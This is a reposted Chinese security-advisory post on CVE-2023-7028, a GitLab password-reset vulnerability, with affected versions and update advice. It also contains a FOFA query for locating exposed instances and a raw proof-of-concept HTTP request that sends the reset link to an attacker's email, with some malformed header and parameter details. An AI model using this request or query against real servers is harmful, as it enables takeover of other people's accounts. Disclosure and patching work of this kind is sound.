声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,禁止私自转载,如需转载,请联系作者!!!!
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!!!!!
漏洞介绍
GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务,2024年1月11日,Gitlab 官方披露 CVE-2023-7028,GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。
影响版本
16.1 <=GitLab CE<16.1.616.2 <=GitLab CE<16.2.816.3 <=GitLab CE<16.3.616.4 <=GitLab CE<16.4.416.5 <=GitLab CE<16.5.616.6 <=GitLab CE<16.6.416.7 <=GitLab CE<16.7.216.1 <=GitLab EE<16.1.616.2 <=GitLab EE<16.2.816.3 <=GitLab EE<16.3.616.4 <=GitLab EE<16.4.416.5 <=GitLab EE<16.5.616.6 <=GitLab EE<16.6.416.7 <=GitLab EE<16.7.2
漏洞情报
fofa语句
icon_hash="85c754581e1d4b628be5b7712c042224"Poc
漏洞利用条件:
1、需获取系统已有用户注册邮箱地址
2、满足影响版本
POST /users/password/ HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 150Origin: https://git.ryzoweba.comConnection: keep-aliveCookie: preferred_language=zh_CN; _gitlab_session=e00664e028c369cdd6dff19f6d7b76bfUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Mode: xiaoaiSec-Fetch-Site: same-originSec-Fetch-User: ?1authenticity_token=vJBEyoTkR10UJNhrFcoJOYftTHaxPj3MHVSJusNt85SyyZ60RajsS2RsgkMetn7hd_k891ZUNCdePjdW5uUW6w&user%5Bemail%5D%5B%5D=目标邮箱地址&user%5Bemail]%5D%5B%5D=攻击者邮箱地址
修复建议
建议及时更新至最新版本!关注我们
原文始发于微信公众号(极星信安):安全情报,GitLab 存在任意用户密码重置漏洞!!!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论